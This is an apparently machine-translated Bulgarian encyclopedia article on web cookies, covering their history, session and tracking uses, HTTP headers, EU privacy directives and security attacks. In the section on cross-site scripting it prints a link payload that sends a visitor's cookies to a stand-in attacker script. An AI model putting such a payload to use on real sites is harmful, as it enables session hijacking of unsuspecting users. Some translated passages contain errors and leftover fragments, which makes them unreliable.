in Определения, Wiki

Интернет бисквитка: какво е това? Определение, произход, видове и поверителност

Каква е ролята на бисквитката, какво представлява и какви са видовете бисквитки? 🍪

56.3k Прегледи 384 Гласове

Интернет бисквитка: какво е това? Определение, произход, видове и поверителност
Интернет бисквитка: какво е това? Определение, произход, видове и поверителност

Un бисквитка или уеб бисквитка (или бисквитка, съкратено като свидетел в Квебек) се дефинира от комуникационния протокол HTTP като поредица от информация, изпратена от HTTP сървър към HTTP клиент, която последният връща всеки път, когато същият HTTP сървър бъде заявен при определени условия.

Бисквитката е еквивалент на a малък текстов файл, съхраняван на терминала на интернет потребителя. Съществуващи повече от 20 години, те позволяват на разработчиците на уебсайтове да съхраняват потребителски данни, за да улеснят тяхната навигация и да позволят определени функционалности. Бисквитките винаги са били повече или по-малко спорни, защото съдържат остатъчна лична информация, която потенциално може да бъде използвана от трети страни.

Той се изпраща като HTTP хедър от уеб сървъра към уеб браузъра, който го връща непроменен всеки път, когато има достъп до сървъра. Бисквитката може да се използва за удостоверяване, сесия (държавна издръжка), и за съхранява специфична информация за потребителя, като например предпочитанията на сайта или съдържанието на електронна количка за пазаруване. Терминът бисквитка произлиза от магическа бисквитка, добре позната концепция в UNIX компютрите, която вдъхнови идеята и името на бисквитките на браузъра. Съществуват няколко алтернативи на бисквитките, всяка със собствена употреба, предимства и недостатъци.

Тъй като са прости текстови файлове, бисквитките не са изпълними. Те не са нито шпионски софтуер, нито вируси, въпреки че бисквитките от някои сайтове се откриват от много антивирусни програми, тъй като позволяват на потребителите да бъдат проследявани, когато посещават множество сайтове. 

Повечето съвременни браузъри позволяват на потребителите да решите дали да приемете или отхвърлите бисквитките. Потребителите също могат изберете колко дълго да се съхраняват бисквитките. Пълното отхвърляне на бисквитките обаче прави някои сайтове неизползваеми. Например, съхранявайте пазарски колички или сайтове, които изискват влизане с идентификационни данни (потребителско име и парола).

Съдържание

История

терминът курабийка произлиза от английския термин магическа бисквитка, което е пакет от данни, които програмата получава и връща непроменени. Бисквитките вече са били използвани в ИТ, когато Лу Монтули имаше идеята да ги използва в уеб комуникациите през юни 1994. По това време той е нает от Netscape Communications, която е разработила приложение за електронна търговия за клиент. Бисквитките дадоха решение на проблема с надеждността на внедряването на виртуалната пазарска количка в магазина.

Джон Джанандреа и Лу Монтули написаха първата спецификация на бисквитките на Netscape същата година. Версия 0.9 бета на Mosaic Netscape, издадена на 13 октомври 1994 г., интегрирана технология за бисквитки (виж публикацията). Първото (неекспериментално) използване на бисквитки беше да се определи дали посетителите на уебсайта на Netscape са посещавали сайта преди. Montulli подава патентна заявка за технология за бисквитки през 1995 г. и патент на САЩ 5774670 е издаден. предоставен през 1998 г.

След като бяха внедрени в Netscape 0.9 beta през 1994 г., бисквитките бяха интегрирани в Internet Explorer 2, пуснат през октомври 1995 г.

Въвеждането на бисквитките все още не е широко известно на обществеността. По-специално, бисквитките се приемат по подразбиране в настройките на браузъра и потребителите не са информирани за тяхното присъствие. Някои хора знаеха за съществуването на бисквитки около първото тримесечие на 1995 г., но широката общественост разбра за съществуването им едва след като Financial Times публикува статия на 12 февруари 1996 г. През същата година бисквитките получиха голямо медийно внимание поради възможни намеси в поверителността. Темата за бисквитките беше обсъдена на две консултации на Американската федерална търговска комисия през 1996 и 1997 г.

Разработването на официалната спецификация на бисквитките вече е в ход. Първите дискусии на официалната спецификация се състояха през април 1995 г. в пощенския списък www-talk. Създадена е специална работна група на IETF. Две алтернативни предложения за въвеждане на състояние в HTTP транзакциите бяха предложени съответно от Brian Behlendorf и David Kristol, но групата, ръководена от самия Kristol, реши да използва спецификацията на Netscape като отправна точка. През февруари 1996 г. работната група установи, че бисквитките на трети страни са значителна заплаха за поверителността. Спецификацията, създадена от групата, в крайна сметка беше публикувана като RFC 2109.

От края на 2014 г. виждаме банер за бисквитки на много сайтове. Има поне едно разширение на браузъра, което позволява банерът не се показва.

Видове бисквитки и употреби

Управление на сесии

Бисквитките могат да се използват за поддържане на потребителски данни по време на навигация, но също и при множество посещения. Бисквитките бяха въведени, за да осигурят средство за внедряване на електронни колички за пазаруване, виртуално устройство, в което потребителят може да натрупва артикулите, които иска да купи, докато сърфира в сайта.

В наши дни приложения като пазарски колички вместо това съхраняват списъка с артикули в база данни на сървър, което е за предпочитане; отколкото да ги запазите в самата бисквитка. Уеб сървърът изпраща бисквитка, съдържаща уникален идентификатор на сесия. След това уеб браузърът връща този идентификатор на сесия при всяка следваща заявка и елементите в кошницата се запазват и свързват със същия уникален идентификатор на сесия.

Честото използване на бисквитки е полезно за влизане в сайт чрез идентификационни данни. Накратко, уеб сървърът първо изпраща бисквитка, съдържаща уникален идентификатор на сесия. След това потребителите предоставят своите идентификационни данни (обикновено потребителско име и парола). След това уеб приложението удостоверява сесията и позволява на потребителя достъп до услугата.

персонализация

Бисквитките могат да се използват за запомняне на информация за потребителя на даден сайт, за да му се показва подходящо съдържание в бъдеще. Например, уеб сървър може да изпрати бисквитка, съдържаща последното потребителско име, използвано за влизане в този уебсайт, така че потребителското име да може да бъде предварително попълнено при бъдещи посещения.

Много уебсайтове използват бисквитки за персонализиране въз основа на потребителските предпочитания. Потребителите избират своите предпочитания във формуляр и ги изпращат на сървъра. Сървърът кодира предпочитанията в бисквитка и я изпраща обратно на браузъра. Впоследствие всеки път, когато потребителят влезе в страница от този сайт, браузърът връща бисквитката и следователно списъка с предпочитания; след това сървърът може да персонализира страницата според предпочитанията на потребителя. Например уебсайтът на Wikipedia позволява на своите потребители да избират кожата на сайта, който предпочитат. Търсачката Google позволява на своите потребители (дори и да не са регистрирани) да избират броя резултати, които искат да виждат на всяка страница с резултати.

Проследяване

Проследяващите бисквитки се използват за проследяване на навиците за сърфиране на интернет потребителите. Това може да се направи отчасти и чрез използване на IP адреса на компютъра, който прави заявка за страница, или чрез използване на HTTP заглавката „referrer“, която клиентът изпраща с всяка заявка, но бисквитките позволяват по-голяма точност. Това може да стане както в следния пример:

  1. Ако потребителят извика страница на сайт и заявката не съдържа бисквитка, сървърът приема, че това е първата страница, посетена от потребителя. След това сървърът създава произволен низ и го изпраща на браузъра заедно с исканата страница.
  2. От този момент бисквитката ще се изпраща автоматично от браузъра при всяко извикване на нова страница от сайта. Сървърът ще изпрати страницата както обикновено, но също така ще регистрира URL адреса на извиканата страница, датата, часа на заявката и бисквитката в регистрационен файл.

Чрез разглеждане на регистрационния файл е възможно да видите кои страници е посетил потребителят и в какъв ред. Например, ако файлът съдържа няколко заявки, направени с помощта на бисквитката id=abc, това може да установи, че всички тези заявки идват от един и същ потребител. Заявеният URL адрес, датата и часът, свързани със заявките, позволяват да се проследи сърфирането на потребителя.

Бисквитките и уеб маяците на трети страни, обяснени по-долу, допълнително позволяват проследяване в различни сайтове. Проследяването на един сайт обикновено се използва за статистически цели. За разлика от това, проследяването в различни сайтове, използващи бисквитки на трети страни, обикновено се използва от рекламните компании за създаване на анонимни потребителски профили (които след това се използват за определяне кои реклами трябва да се показват на потребителя, както и за изпращане на имейли, съответстващи на тези реклами — СПАМ ).

Проследяващите бисквитки са риск от нахлуване в поверителността на потребителя, но могат лесно да бъдат изтрити. Повечето съвременни браузъри включват опция за автоматично изтриване на постоянни бисквитки при затваряне на приложението.

Бисквитки на трети страни

Изображения и други обекти, съдържащи се в уеб страница, може да се намират на сървъри, различни от този, който хоства страницата. За да покаже страницата, браузърът изтегля всички тези обекти. Повечето уебсайтове съдържат информация от различни източници. Например, ако въведете www.example.com в браузъра си, често ще има обекти или реклами на част от страницата, които идват от различни източници, т.е. от домейн, различен от www. .example.com. „Бисквитките на първа страна“ са бисквитки, които се задават от домейна, посочен в адресната лента на браузъра. Бисквитките на трети страни се задават от един от обектите на страницата, който идва от различен домейн.

По подразбиране браузъри като Mozilla Firefox, Microsoft Internet Explorer и Opera приемат бисквитки на трети страни, но потребителите могат да променят настройките в опциите на браузъра, за да ги блокират. Няма риск за сигурността, присъщ на бисквитките на трети страни, които позволяват уеб функционалност, но те се използват и за проследяване на потребители. от сайт на сайт.

Инструменти като Ghostery, налични за всички браузъри, включително Google Chrome, могат да блокират обмена между трети страни.

Имплементация

Възможно взаимодействие между уеб браузър и сървъра, хостващ уеб страницата. Сървърът изпраща бисквитка на браузъра и браузърът я изпраща обратно, когато извика друга страница.
Възможно взаимодействие между уеб браузър и сървъра, хостващ уеб страницата. Сървърът изпраща бисквитка на браузъра и браузърът я изпраща обратно, когато извика друга страница.

Бисквитките са малки части от данни, изпратени от уеб сървъра към браузъра. Браузърът ги връща непроменени на сървъра, въвеждайки състояние (памет за минали събития) в иначе бездържавната HTTP транзакция. Без бисквитки всяко извличане на уеб страница или компонент от уеб страница е изолирано събитие, независимо от други заявки, отправени към същия сайт. В допълнение към възможността да се задават от уеб сървъра, бисквитките могат да се задават и чрез скриптови езици като JavaScript, ако се поддържат и разрешават от браузъра.

Официалната спецификация на бисквитките предполага, че браузърите трябва да могат да запазват и изпращат повторно минимален брой бисквитки. По-конкретно, браузърът трябва да може да съхранява най-малко 300 бисквитки от четири килобайта всяка и поне 20 бисквитки за един сървър или домейн.

Съгласно раздел 3.1 от RFC 2965, имената на бисквитките не са чувствителни към главни и малки букви.

Бисквитката може да посочи датата на изтичане на срока й, в който случай бисквитката ще бъде изтрита на тази дата. Ако бисквитката не посочва дата на изтичане, бисквитката се изтрива веднага щом потребителят напусне своя браузър. Следователно указването на дата на изтичане е начин бисквитката да оцелее през множество сесии. Поради тази причина се казва, че бисквитките със срок на годност са упорит. Примерно приложение: сайт за търговия на дребно може да използва постоянни бисквитки, за да записва артикулите, които потребителите са поставили в пазарската си количка (в действителност бисквитката може да се отнася до запис, записан в база данни на сайта за продажба, а не във вашия компютър) . По този начин, ако потребителите напуснат своя браузър, без да направят покупка и се върнат към него по-късно, те ще могат да намерят артикулите в количката отново. Ако тези бисквитки не дават дата на изтичане, те ще изтекат при затваряне на браузъра и информацията за съдържанието на кошницата ще бъде загубена.

Бисквитките могат да бъдат ограничени по обхват до конкретен домейн, поддомейн или път на сървъра, който ги е създал.

Прехвърлянето на уеб страници се извършва с помощта на HyperText Transfer Protocol (HTTP). Като игнорират бисквитките, браузърите извикват страница от уеб сървъри, като обикновено им изпращат кратък текст HTTP заявка. Например, за достъп до страницата www.example.org/index.html, браузърите се свързват със сървъра www.example.org и изпращат заявка, която изглежда така:

GET /index.html HTTP/1.1Host: www.example.org
Navigateurserveur

Сървърът отговаря, като изпраща исканата страница, предшествана от подобен текст, като цялата се извиква HTTP отговор. Този пакет може да съдържа редове, инструктиращи браузъра да съхранява бисквитки:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: име=стойност
(HTML страница)
Navigateurserveur

Сървърът изпраща реда Set-Cookie само ако иска браузърът да съхранява бисквитка. Set-Cookie е заявка към браузъра да съхранява низа name=value и да го връща при всички бъдещи заявки към сървъра. Ако браузърът поддържа бисквитки и бисквитките са разрешени в опциите на браузъра, бисквитката ще бъде включена във всички последващи заявки, направени към същия сървър. Например, браузърът извиква страницата www.example.org/news.html, като изпраща следната заявка до сървъра www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigateurserveur

Това е заявка за друга страница от същия сървър и се различава от първата по-горе, тъй като съдържа низ, изпратен от сървъра преди това на браузъра. Благодарение на това средство сървърът знае, че тази заявка е свързана с предишната. Сървърът отговаря, като изпраща извиканата страница, а също и като добавя други бисквитки към нея.

Стойността на бисквитката може да бъде променена от сървъра чрез изпращане на нов ред Set-Cookie: name=new_value в отговор на извиканата страница. След това браузърът заменя старата стойност с новата.

Редът Set-Cookie обикновено се създава от CGI програма или друг скриптов език, а не от HTTP сървъра. HTTP сървърът (пример: Apache) ще предаде само резултата от програмата (документ, предшестван от заглавката, съдържаща бисквитките) на браузъра.

Бисквитките могат също да бъдат зададени от JavaScript или други подобни езици, работещи в браузъра, т.е. от страната на клиента, а не от страната на сървъра. В JavaScript за тази цел се използва обектът document.cookie. Например изразът document.cookie = "temperature=20" създава бисквитка с име "temperature" и със стойност 20.

Пример за HTTP отговор от google.com, който задава бисквитка с атрибути.
Пример за HTTP отговор от google.com, който задава бисквитка с атрибути.

В допълнение към двойката име/стойност, бисквитката може също да съдържа дата на изтичане, път, име на домейн и вида на предвидената връзка, т.е. нормална или криптирана. RFC 2965 също така определя, че бисквитките трябва да имат задължителен номер на версия, но това обикновено се пропуска. Тези части от данни следват двойката name=new_value и са разделени с точка и запетая. Например бисквитка може да бъде създадена от сървъра чрез изпращане на ред Set-Cookie: name=new_value; изтича=дата; път=/; домейн=.example.org.

Бисквитките изтичат и след това не се изпращат от браузъра към сървъра в следните ситуации:

  • Когато браузърът е затворен, ако бисквитката не е постоянна.
  • Когато срокът на валидност на бисквитката изтече.
  • Когато датата на изтичане на бисквитката се промени (от сървъра или скрипта) на дата в миналото.
  • Когато браузърът изтрие бисквитката по искане на потребителя.

Третата ситуация позволява на сървъри или скриптове изрично да изтрият бисквитка. Имайте предвид, че с уеб браузъра Google Chrome е възможно да знаете датата на изтичане на конкретна бисквитка чрез достъп до настройките за съдържание. Бисквитка, записана на компютър, може много добре да остане там няколко десетилетия, ако не се предприеме процедура за изтриването й.

Стереотипи

От въвеждането им в интернет много идеи за бисквитките се разпространяват в интернет и медиите. През 1998 г. CIAC, екип за мониторинг на компютърни инциденти на Министерството на енергетиката на Съединените щати, установи, че уязвимостите в сигурността на бисквитките „по същество не съществуват“ и обясни, че „информацията за произхода на вашите посещения и подробностите за уеб страниците, които сте посетили вече съществуват в регистрационните файлове на уеб сървърите”. През 2005 г. Jupiter Research публикува резултатите от проучване, в което значителен процент от респондентите разглеждат следните твърдения:

  • Бисквитките са като вирус, те заразяват твърдите дискове на потребителите.
  • Бисквитките генерират поп-нагоре.
  • Бисквитките се използват за изпращане спам.
  • Бисквитките се използват само за реклама.

Бисквитките не могат да изтрият или прочетат информация от компютъра на потребителя. Въпреки това бисквитките позволяват да се открият уеб страниците, посетени от потребител на даден сайт или набор от сайтове. Тази информация може да се събира в потребителски профил, който може да се използва или препродава на трети страни, което може да създаде сериозни проблеми с поверителността. Някои профили са анонимни, в смисъл, че не съдържат лична информация, но дори такива профили могат да бъдат съмнителни.

Според същото проучване голям процент от интернет потребителите не знаят как да изтрият бисквитки. Една от причините хората да не вярват на бисквитките е, че някои сайтове са злоупотребили с личния аспект на бисквитките и са споделили тази информация с други източници. Голям процент от насочената реклама и нежеланите имейли, считани за спам, идват от информация, събрана от проследяващи бисквитки.

Настройки на браузъра

Повечето браузъри поддържат бисквитки и позволяват на потребителя да ги деактивира. Най-често срещаните опции са:

  • Активирайте или деактивирайте напълно бисквитките, така че да бъдат постоянно приемани или блокирани.
  • Позволете на потребителя да види активните бисквитки в дадена страница, като въведете javascript: alert(document.cookie) в адресната лента на браузъра. Някои браузъри включват мениджър на бисквитки за потребителя, който може да преглежда и избирателно да изтрива бисквитки, съхранявани в момента от браузъра.

Повечето браузъри също позволяват пълно изтриване на лични данни, включително бисквитки. Съществуват и допълнителни модули за контрол на разрешенията за бисквитки.

Поверителност и бисквитки на трети страни

В този фиктивен пример рекламна компания е поставила банери на два уебсайта. Като хоства банерите на своите сървъри и използва бисквитки на трети страни, рекламната компания е в състояние да проследи навигацията на потребителя през тези два сайта.

Бисквитките имат важно значение за поверителността и анонимността на уеб потребителите. Въпреки че бисквитките се изпращат обратно само към сървъра, който ги е задал, или към сървър, принадлежащ към същия интернет домейн, уеб страницата може обаче да съдържа изображения или други компоненти, съхранени на сървъри, принадлежащи към други домейни. Бисквитките, които се задават по време на възстановяването на тези външни компоненти, се извикват бисквитки на трети страни. Това включва бисквитки от нежелани изскачащи прозорци.

Рекламните компании използват бисквитки на трети страни, за да проследяват потребителите в различните сайтове, които посещават. По-специално рекламна компания може да проследи потребител във всички страници, където е поставила рекламни изображения или проследяващ пиксел. Познаването на посетените от потребителя страници позволява на рекламната компания да се насочи към рекламните предпочитания на потребителя.

Възможността за създаване на потребителски профил се счита от някои за нарушаване на поверителността, особено когато проследяването се извършва в различни домейни с помощта на бисквитки на трети страни. Поради тази причина някои страни имат законодателство относно бисквитките.

Правителството на Съединените щати въведе строги правила за поставяне на бисквитки през 2000 г., след като беше разкрито, че Службата за политиката в областта на наркотиците на Белия дом използва бисквитки за проследяване на компютрите на потребителите, гледащи онлайн реклами на лекарства. През 2002 г. активистът за защита на личните данни Даниел Бранд откри, че ЦРУ оставя постоянни бисквитки на компютрите, които са посетили уебсайтовете му. След като беше информирано за това нарушение, ЦРУ обяви, че тези бисквитки не са били умишлено изпратени и престана да ги задава. На 25 декември 2005 г. Бранд открива, че Агенцията за национална сигурност (NSA) е оставила две постоянни бисквитки на компютрите на посетителите поради актуализация на софтуера. След като беше уведомен, NSA незабавно деактивира бисквитките.

В Обединеното кралство, Закон за бисквитките “, влязъл в сила на 25 май 2012 г., задължава сайтовете да декларират намеренията си, като по този начин позволява на потребителите да избират дали искат да оставят следи или не за своето преминаване в Интернет. По този начин те могат да бъдат защитени от рекламно насочване. Въпреки това, Според "Гардиън", съгласието на интернет потребителите не е непременно изрично; са направени промени в условията на потребителското съгласие, което го прави така се подразбира.

Директива 2002/58 относно неприкосновеността на личния живот

Директива 202/58 за поверителност и електронни комуникации съдържа правила относно използването на бисквитки. По-специално, член 5, параграф 3 от тази директива изисква съхраняването на данни (като бисквитки) в компютъра на потребителя да може да се извършва само ако:

  • потребителят е информиран как се използват данните;
  • на потребителя се дава възможност да откаже тази операция за съхранение. Този член обаче също така посочва, че съхраняването на данни по технически причини е изключено от този закон.

Директивата, която трябваше да бъде приложена от октомври 2003 г., обаче беше много несъвършено приложена на практика според доклад от декември 2004 г., който също така посочи, че някои държави-членки (Словакия, Латвия, Гърция, Белгия и Люксембург) все още не са транспонирали директива във вътрешното право.

Според становището на G29 от 2010 г. тази директива, която по-специално обуславя използването на бисквитки за целите на поведенческата реклама, с изричното съгласие на интернет потребителя, остава много слабо прилагана. Всъщност повечето сайтове го правят по начин, който не е в съответствие с директивата, като се ограничават до обикновен „банер“, информиращ за използването на „бисквитки“, без да дават информация за употребата, без да правят разлика между „техническите“ бисквитки. „проследяващи“ бисквитки, нито да предложи реален избор на потребителя, който желае да поддържа технически бисквитки (като например бисквитки за управление на пазарска количка) и да откаже „проследяващи“ бисквитки. Всъщност много сайтове не функционират правилно, ако бисквитките са отказани, което не е в съответствие с Директива 2002/58 или Директива 95/46 (Защита на личните данни).

Директива 2009 / 136 / CE

Този материал е актуализиран с Директива 2009/136/ЕО от 25 ноември 2009 г., която гласи, че „съхраняването на информация или получаването на достъп до вече съхранена информация в крайното оборудване на абонат или потребител е разрешено само при условие, че абонатът или потребителят е дал своето съгласие, след като е получил, в съответствие с Директива 95/46/ЕО, ясна и пълна информация между други лица за целите на обработката“. Следователно новата директива засилва задълженията преди поставянето на бисквитки на компютъра на интернет потребителя.

В предварителните съображения на директивата обаче европейският законодател уточнява: „Когато е технически възможно и ефективно, в съответствие със съответните разпоредби на Директива 95/46/ЕО, съгласието на потребителя по отношение на обработването може да бъде изразено чрез използване на подходящите настройки на браузър или друго приложение”. Но всъщност нито един досегашен браузър не дава възможност да се разграничат основните технически бисквитки от незадължителните, които трябва да бъдат оставени на избора на потребителя.

Тази нова директива беше транспонирана от белгийските депутати през юли 2012 г. Проучване от 2014 г. показва, че дори депутатите се затрудняват да прилагат ограниченията на директивата.

P3P

P3P спецификацията включва способността на сървъра да посочи политика за поверителност, която определя какъв вид информация събира и за каква цел. Тези политики включват (но не се ограничават до) използването на информация, събрана чрез бисквитки. Съгласно дефинициите на P3P, браузърът може да приема или отхвърля бисквитки, като сравнява политиките за поверителност с предпочитанията на потребителя или като пита потребителя, представяйки декларацията за поверителност на политиката за поверителност, декларирана от сървъра.

Много браузъри, включително Apple Safari и Microsoft Internet Explorer версии 6 и 7, поддържат P3P, което позволява на браузъра да определи дали да приеме съхранение на бисквитки на трети страни. Браузърът Opera позволява на потребителите да отказват бисквитки на трети страни и да създават глобален и специфичен профил за сигурност за интернет домейни. Mozilla Firefox версия 2 отказа P3P поддръжката, но я възстанови във версия 3.

Бисквитките на трети страни могат да бъдат блокирани от повечето браузъри, за да се повиши поверителността и да се намали проследяването на рекламите, без това да повлияе негативно на уеб изживяването на потребителя. Много рекламни агенции предлагат вариант откажете се за насочена реклама, чрез настройка на обща бисквитка в браузъра, която деактивира това насочване, но такова решение не е практически ефективно, когато се спазва, тъй като тази обща бисквитка се изтрива веднага щом потребителят изтрие тези бисквитки, което отменя опцията решение.

Недостатъци на бисквитките

В допълнение към проблемите с поверителността, бисквитките имат и някои технически недостатъци. По-специално, те не винаги идентифицират точно потребителите, могат да забавят работата на сайта, когато са в големи количества, могат да се използват за атаки срещу сигурността и са в конфликт с прехвърлянето на представително състояние, архитектурния стил на софтуера.

Неточна идентификация

Ако на компютъра се използва повече от един браузър, във всеки от тях винаги има отделна единица за съхранение на бисквитки. Следователно бисквитките не идентифицират човек, а комбинацията от потребителски акаунт, компютър и уеб браузър. По този начин всеки може да използва тези акаунти, компютри или браузъри, които имат набор от бисквитки. По същия начин, бисквитките не правят разлика между множество потребители, които споделят един и същ потребителски акаунт, компютър и браузър, като например в „интернет кафенета“ или всяко друго място, предоставящо безплатен достъп до компютърни ресурси.

Но на практика това твърдение се оказва погрешно в повечето случаи, тъй като днес "личен" компютър (или смартфон, или таблет, което е по-лошо) се използва главно от един човек.Това означава да се насочите към конкретно лице и чрез обема събрана информация се достига до персонализирано насочване, дори ако лицето не е „именно“ идентифицирано.

Бисквитката може да бъде открадната от друг компютър в мрежата.

По време на нормална работа бисквитките се изпращат обратно между сървъра (или група сървъри в един и същи домейн) и браузъра на компютъра на потребителя. Тъй като бисквитките могат да съдържат чувствителна информация (потребителско име, парола, използвана за удостоверяване и т.н.), техните стойности не трябва да са достъпни за други компютри. Кражбата на бисквитки е акт на прихващане на бисквитки от неоторизирана трета страна.

Бисквитките могат да бъдат откраднати чрез пакетен снифър при атака, наречена отвличане на сесия. Трафикът в мрежата може да бъде прихванат и прочетен от компютри, различни от изпращащите и получаващите (особено в некриптираното обществено Wi-Fi пространство). Този трафик включва бисквитки, изпратени през сесии с помощта на обикновен HTTP протокол. Когато мрежовият трафик не е криптиран, злонамерените потребители могат по този начин да четат комуникациите на други потребители в мрежата, използвайки "пакетни снифери".

Този проблем може да бъде преодолян чрез шифроване на връзката между компютъра на потребителя и сървъра чрез HTTPS протокола. Сървърът може да посочи a защитен флаг докато задавате бисквитка; браузърът ще го изпрати само по защитена линия, като например SSL връзка.

Много сайтове обаче, въпреки че използват HTTPS криптирана комуникация за удостоверяване на потребителя (т.е. страницата за вход), по-късно изпращат сесийни бисквитки и други данни както обикновено, чрез некриптирани HTTP връзки от съображения за ефективност. По този начин нападателите могат да прихванат бисквитките на други потребители и да се представят за тях на подходящи сайтове или да ги използват в атаки с бисквитки.

Скриптове в сайта: бисквитка, която трябва да се обменя само между сървъра и клиента, се изпраща на друга трета страна.

Друг начин за кражба на бисквитки е да се правят скриптове на сайтове и самият браузър да изпраща бисквитки до злонамерени сървъри, които никога не ги получават. Съвременните браузъри позволяват изпълнение на желани части от код от сървъра. Ако бисквитките са достъпни по време на изпълнение, техните стойности може да бъдат съобщени под някаква форма на сървъри, които не трябва да имат достъп до тях. Шифроването на бисквитките, преди да бъдат изпратени по мрежата, не помага за осуетяването на атаката.

Този тип скриптове за сайтове обикновено се използват от нападатели на сайтове, които позволяват на потребителите да публикуват HTML съдържание. Чрез интегриране на част от съвместим код в HTML приноса, атакуващият може да получи бисквитки от други потребители. Познаването на тези бисквитки може да се използва чрез свързване към същия сайт, използвайки откраднатите бисквитки, като по този начин бъдете разпознати като потребител, чиито бисквитки са били откраднати.

Един от начините за предотвратяване на подобни атаки е използването на флага HttpOnly; това е опция, въведена от версия 6 на Internet Explorer в PHP от версия 5.2.0, която се планира да направи бисквитката недостъпна за клиента близо до скрипта. Уеб разработчиците обаче трябва да вземат това предвид при разработването на своя сайт, така че да са имунизирани срещу скриптове в сайта.

Друга използвана заплаха за сигурността е фабрикуването на заявки в сайта.

Официалната техническа спецификация позволява бисквитките да бъдат изпращани обратно само до сървъри в домейна, от който произхождат. Стойността на бисквитките обаче може да бъде изпратена до други сървъри, като се използват средства, различни от заглавките на бисквитките.

По-специално, скриптовите езици като JavaScript обикновено имат достъп до стойности на бисквитките и могат да изпращат произволни стойности до всеки сървър в Интернет. Тази възможност за скриптове се използва от уебсайтове, позволяващи на потребителите да публикуват HTML съдържание, което други потребители да преглеждат.

Например, нападател, работещ в домейна example.com, може да публикува коментар, съдържащ следната връзка, сочеща към популярен блог, който иначе не контролира:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Когато друг потребител щракне върху тази връзка, браузърът изпълнява частта от кода на атрибута onclick, така че заменя низа document.cookie със списъка с потребителски бисквитки, които са активни за тази страница. Следователно този списък с бисквитки се изпраща до сървъра example.com и следователно атакуващият може да събере бисквитките на този потребител.

Този тип атака е трудна за откриване от страна на потребителя, тъй като скриптът идва от същия домейн, който е задал бисквитката, и операцията за изпращане на стойностите изглежда е разрешена от този домейн. Счита се, че е отговорност на администраторите, управляващи този тип сайтове, да въведат ограничения, предотвратяващи публикуването на зловреден код.

Бисквитките не се виждат директно от програми от страна на клиента като JavaScript, ако са изпратени с флага HttpOnly. От гледна точка на сървъра единствената разлика е, че в реда на заглавката Set-Cookie се добавя ново поле, съдържащо низа HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Когато браузърът получи такава бисквитка, той трябва да я използва нормално в следващия HTTP обмен, но без да я прави видима за скриптове, изпълнявани от страна на клиента. Флагът HttpOnly не е част от никоя официална техническа спецификация и не е внедрен във всички браузъри. Имайте предвид, че понастоящем няма начин да се предотврати четенето и записването на сесийни бисквитки чрез метода XMLHTTPRequest.

Промяна на съдържанието: атакуващ изпраща невалидна бисквитка на сървър, вероятно направена от валидна бисквитка, изпратена от сървъра.

Веднага след като бисквитките трябва да бъдат съхранени и върнати непроменени на сървъра, атакуващият може да промени стойността на бисквитките, преди да бъдат изпратени обратно на сървъра. Например, ако бисквитката съдържа общата стойност, която потребителят трябва да плати за артикулите, поставени в количката за пазаруване на магазина, промяната на тази стойност излага сървъра на риск от таксуване на атакуващия по-малко от началната цена. Процесът на промяна на стойността на бисквитките се нарича отравяне с бисквитки и може да се използва след кражба на бисквитки, за да направи атаката постоянна.

При метода за отмяна на бисквитките атакуващият използва грешка в браузъра, за да изпрати невалидна бисквитка на сървъра.

Повечето уебсайтове обаче съхраняват само идентификатор на сесия – произволно генериран уникален номер, използван за идентифициране на потребителя на сесията – в самата бисквитка, докато цялата друга информация се съхранява на сървъра. В този случай този проблем е до голяма степен решен.

Очаква се всеки сайт да има свои собствени бисквитки, така че един сайт не трябва да може да променя или създава бисквитки, свързани с друг сайт. Пропуск в сигурността на уеб браузъра може да позволи на злонамерени сайтове да нарушат това правило. Използването на такъв недостатък обикновено се нарича междусайтово готвене. Целта на такива атаки може да е кражба на идентификатор на сесия.

Потребителите трябва да използват най-новите версии на уеб браузъри, в които тези уязвимости са практически елиминирани.

Конфликтно състояние между клиент и сървър

Използването на бисквитки може да генерира противоречие между състоянието на клиента и състоянието, съхранено в бисквитката. Ако потребителят придобие бисквитка и щракне върху бутона „Назад“ на браузъра, състоянието на браузъра обикновено не е същото като преди това придобиване. Например, ако кошницата на онлайн магазин е създадена с помощта на бисквитки, съдържанието на кошницата не може да се промени, когато потребителят се върне към хронологията на браузъра: ако потребителят натисне бутон за добавяне на артикул в своята кошница и кликне върху „Връщане ", статията остава в тази. Това може да не е намерението на потребителя, който със сигурност иска да отмени добавянето на статията. Това може да доведе до ненадеждност, объркване и грешки. Така че уеб разработчиците трябва да са наясно с този проблем и да прилагат мерки за справяне със ситуации като тази.

Постоянните бисквитки бяха критикувани от експерти по сигурността на поверителността, че не са настроени да изтичат достатъчно скоро, като по този начин позволяват на уебсайтовете да проследяват потребителите и да изграждат техния профил с течение на времето. Този аспект на бисквитките също е част от проблема с отвличането на сесия, тъй като открадната постоянна бисквитка може да се използва за представяне на потребител за значителен период от време.

За да прочетете също така: GAFAM: кои са те? Защо (понякога) са толкова страшни?

Алтернативи на бисквитките

Някои операции, които могат да бъдат извършени с помощта на бисквитки, могат да се извършат и с помощта на други механизми, които заобикалят бисквитките или пресъздават изтрити бисквитки, което създава проблеми с поверителността по същия начин (или понякога по-лошо, защото тогава са невидими), отколкото бисквитките.

IP адрес

Потребителите могат да бъдат проследявани с IP адреса на компютъра, извикващ страницата. Тази техника е достъпна от въвеждането на World Wide Web, тъй като страниците се изтеглят, сървърът изисква IP адреса на компютъра, на който работи браузърът или проксито, ако не се използва такъв. Сървърът може да проследи тази информация независимо дали има използвани бисквитки или не. Въпреки това, тези адреси обикновено са по-малко надеждни при идентифицирането на потребител от бисквитките, тъй като компютрите и проксита може да се споделят от множество потребители и един и същи компютър може да получи различен IP адрес при всяка работна сесия (като често случаят при телефонни връзки) .

Проследяването по IP адреси може да бъде надеждно в някои ситуации, като например широколентови връзки, които поддържат един и същ IP адрес за дълго време, докато захранването е включено.

Някои системи като Tor са проектирани да поддържат анонимността на интернет и да направят проследяването по IP адрес невъзможно или непрактично.

URL

По-прецизна техника се основава на вграждане на информация в URL адреси. Частта от низа на заявката на URL е една техника, която обикновено се използва за тази цел, но могат да се използват и други части. Както Java serverlet, така и механизмите на PHP сесии използват този метод, ако бисквитките не са активирани.

